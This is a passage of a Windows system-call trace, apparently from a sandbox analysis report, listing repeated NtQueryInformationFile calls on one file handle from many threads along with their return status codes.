[0154.693] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297f950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297f950, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1808 os_tid = 0xb0 [0154.695] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f868, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1809 os_tid = 0x314 [0154.696] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fac8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1810 os_tid = 0x804 [0154.698] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f790, FileInformation=0x44d8098) returned 0x0 Thread: id = 1811 os_tid = 0x854 [0154.700] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fb90, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1812 os_tid = 0xa78 [0154.701] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1813 os_tid = 0x7a8 [0154.704] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f8d0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1814 os_tid = 0x330 [0154.705] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299f7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299f7e0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1815 os_tid = 0x3a4 [0154.707] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fdc0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1816 os_tid = 0x67c [0154.710] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1817 os_tid = 0x5cc [0154.712] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1818 os_tid = 0x840 [0154.713] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff40, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1819 os_tid = 0x69c [0154.715] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1820 os_tid = 0x6f0 [0154.716] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1821 os_tid = 0x810 [0154.718] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f9f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f9f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1822 os_tid = 0xa88 [0154.720] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1823 os_tid = 0x43c [0154.722] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa50, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1824 os_tid = 0x670 [0154.724] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfa68, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1825 os_tid = 0xa14 [0154.725] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1826 os_tid = 0x990 [0154.727] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9f0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1827 os_tid = 0x2dc [0154.728] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffac0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1828 os_tid = 0x74c [0154.730] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1829 os_tid = 0x3c4 [0154.732] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1830 os_tid = 0x90 [0154.733] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f880, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1831 os_tid = 0x630 [0154.735] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbb0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1832 os_tid = 0x124 [0154.736] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff18, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1833 os_tid = 0xc0 [0154.738] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f828, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f828, FileInformation=0x44d8098) returned 0xc00000bb Thread: id = 1834 os_tid = 0x360 [0154.740] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd68, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1835 os_tid = 0x920 [0154.741] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc68, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1836 os_tid = 0xbec [0154.743] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1837 os_tid = 0x6b8 [0154.744] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fd30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1838 os_tid = 0x30c [0154.747] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1839 os_tid = 0xbfc [0154.750] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f868, FileInformation=0x44d8098) returned 0x0 Thread: id = 1840 os_tid = 0x3f8 [0154.752] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1841 os_tid = 0x6cc [0154.753] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fd48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fd48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1842 os_tid = 0x830 [0154.755] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f9e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1843 os_tid = 0x75c [0154.757] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fea0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1844 os_tid = 0x7f0 [0154.758] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1845 os_tid = 0x710 [0154.760] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fcb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fcb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1846 os_tid = 0x5d8 [0154.761] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff8d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff8d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1847 os_tid = 0xbe4 [0154.763] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1848 os_tid = 0x600 [0154.764] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1849 os_tid = 0xbd0 [0154.766] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432faa8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432faa8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1850 os_tid = 0x158 [0154.768] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfa60, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1851 os_tid = 0xbd8 [0154.769] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f8c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f8c8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1852 os_tid = 0xbe8 [0154.771] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1853 os_tid = 0xbdc [0154.772] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1854 os_tid = 0x5b4 [0154.774] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe48, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1855 os_tid = 0x614 [0154.776] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f818, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1856 os_tid = 0x690 [0154.777] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1857 os_tid = 0xa68 [0154.778] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fad0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fad0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1858 os_tid = 0x7d0 [0154.780] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1859 os_tid = 0x7d8 [0154.782] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1860 os_tid = 0x24c [0154.784] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd80, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1861 os_tid = 0x9f8 [0154.786] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbc0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1862 os_tid = 0x798 [0154.787] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1863 os_tid = 0xa3c [0154.789] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfba8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1864 os_tid = 0x8c0 [0154.790] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489feb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489feb8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1865 os_tid = 0x700 [0154.793] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff20, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1866 os_tid = 0x708 [0154.795] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef900, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef900, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1867 os_tid = 0xa64 [0154.796] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7b8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1868 os_tid = 0xa30 [0154.798] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1869 os_tid = 0x388 [0154.800] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1870 os_tid = 0x760 [0154.802] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fed8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fed8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1871 os_tid = 0xa54 [0154.804] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1872 os_tid = 0x738 [0154.805] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1873 os_tid = 0x488 [0154.806] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1874 os_tid = 0x6dc [0154.808] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f8e8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1875 os_tid = 0x7a0 [0154.810] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc10, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1876 os_tid = 0x73c [0154.811] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfcd8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1877 os_tid = 0x1c0 [0154.814] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1878 os_tid = 0x7c4 [0154.816] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfdf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1879 os_tid = 0x790 [0154.818] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1880 os_tid = 0x688 [0154.820] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1881 os_tid = 0x240 [0154.823] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1882 os_tid = 0x8e0 [0154.824] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1883 os_tid = 0x880 [0154.826] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fd50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fd50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1884 os_tid = 0x8f0 [0154.827] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfc68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1885 os_tid = 0xa18 [0154.829] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1886 os_tid = 0x8a0 [0154.836] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fb58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fb58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1887 os_tid = 0x870 [0154.841] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fc60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fc60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1888 os_tid = 0x2c4 [0154.843] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1889 os_tid = 0x890 [0154.845] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fe60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1890 os_tid = 0x4e8 [0154.847] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1891 os_tid = 0xcc [0154.849] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1892 os_tid = 0xd0 [0154.850] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1893 os_tid = 0xd4 [0154.852] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f7b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1894 os_tid = 0xd8 [0154.853] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1895 os_tid = 0xdc [0154.855] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f800, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f800, FileInformation=0x44d8098) returned 0x0 Thread: id = 1896 os_tid = 0xe0 [0154.861] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f910, FileInformation=0x44d8098) returned 0x0 Thread: id = 1897 os_tid = 0xe4 [0154.863] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf830, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf830, FileInformation=0x44d8098) returned 0x0 Thread: id = 1898 os_tid = 0xe8 [0154.864] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fa38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1899 os_tid = 0xec [0154.866] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1900 os_tid = 0x748 [0154.868] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1901 os_tid = 0xc4 [0154.870] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f848, FileInformation=0x44d8098) returned 0x0 Thread: id = 1902 os_tid = 0x620 [0154.872] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1903 os_tid = 0x910 [0154.873] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1904 os_tid = 0x950 [0154.875] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1905 os_tid = 0x940 [0154.878] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1906 os_tid = 0x980 [0154.880] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1907 os_tid = 0xa10 [0154.882] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1908 os_tid = 0x72c [0154.884] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1909 os_tid = 0x9e0 [0154.886] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1910 os_tid = 0x9c4 [0154.887] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1911 os_tid = 0xa6c [0154.889] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1912 os_tid = 0xb00 [0154.890] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1913 os_tid = 0xaf8 [0154.892] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f9e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1914 os_tid = 0xae4 [0154.893] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: 